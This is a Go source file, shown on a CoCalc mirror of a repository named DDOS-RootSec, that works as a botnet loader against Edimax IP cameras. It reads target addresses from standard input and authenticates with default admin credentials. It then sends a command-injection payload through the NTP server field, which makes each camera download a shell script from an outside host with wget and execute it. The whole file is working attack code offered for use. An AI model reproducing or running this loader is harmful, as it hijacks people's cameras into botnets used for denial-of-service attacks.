Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Exploits/Edimax/loader.go
5038 views
1
// known working ports are 80, 81, 8080

2
/*

3


4
loader made by Prodigy and dorks found by benshii.

5


6
*/

7


8
package main

9


10
import (

11
	"fmt"

12
	"bufio"

13
	"os"

14
	"net"

15
	"time"

16
	"strings"

17
	"strconv"

18
)

19


20
var (

21
	payload = "action=update&ipcamSource=%2Fntp.asp%3Fr%3D20130724&NTP_enable=1&NTP_serverName=%3b$(cd+/tmp%3b+wget+http%3a//1.1.1.1/sh%3b+chmod+777+sh%3b+sh+sh)&NTP_tzCityNo=16&NTP_tzMinute=0&NTP_daylightSaving=0"

22
	found = 0

23
	connections = 0

24
	connections_failed = 0

25
)

26


27
func check_version(conn net.Conn) bool {

28
	var buffer = [256]byte{}

29


30
	len, err := conn.Read(buffer[:])

31
	if len == 0 || err != nil {

32
		//fmt.Println("failed on read");

33
		return false

34
	}

35


36
	//fmt.Println(string(buffer[:]))

37


38
	return (strings.Contains(string(buffer[:]), "1.4.28") && strings.Contains(string(buffer[:]), "200"))

39
}

40


41
func exploit(target string) {

42
	//fmt.Println(target)

43
	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)

44
	if err != nil {

45
		connections_failed++

46
		return

47
	}

48


49
	connections++

50


51
	conn.Write([]byte("GET / HTTP/1.1\r\nHost: "+ target +"\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\n\r\n"))

52


53
	if check_version(conn) {

54
		found++

55
		fmt.Println("address:", target)

56
		conn.Write([]byte("POST /camera-cgi/admin/param.cgi HTTP/1.1\r\nHost: "+ target +"\r\nContent-Length: "+ strconv.Itoa(len(payload)) +"\r\nCache-Control: max-age=0\r\nAuthorization: Basic YWRtaW46MTIzNA==\r\nUpgrade-Insecure-Requests: 1\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nReferer: http://"+ target +"/ntp.asp?r=20140408_1683324821461\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n"+ payload +"\r\n\r\n"))

57
	}

58
}

59


60
func main() {

61
	go func() {

62
		for {

63
			fmt.Println("connections:", connections, "failed connections:", connections_failed, "found:", found)

64
			time.Sleep(time.Second)

65
		}

66
	}()

67


68
	for {

69
		scanner := bufio.NewScanner(bufio.NewReader(os.Stdin))

70
		for scanner.Scan() {

71
			go exploit(scanner.Text() + ":" + os.Args[1])

72
		}

73
	}

74
}

75


76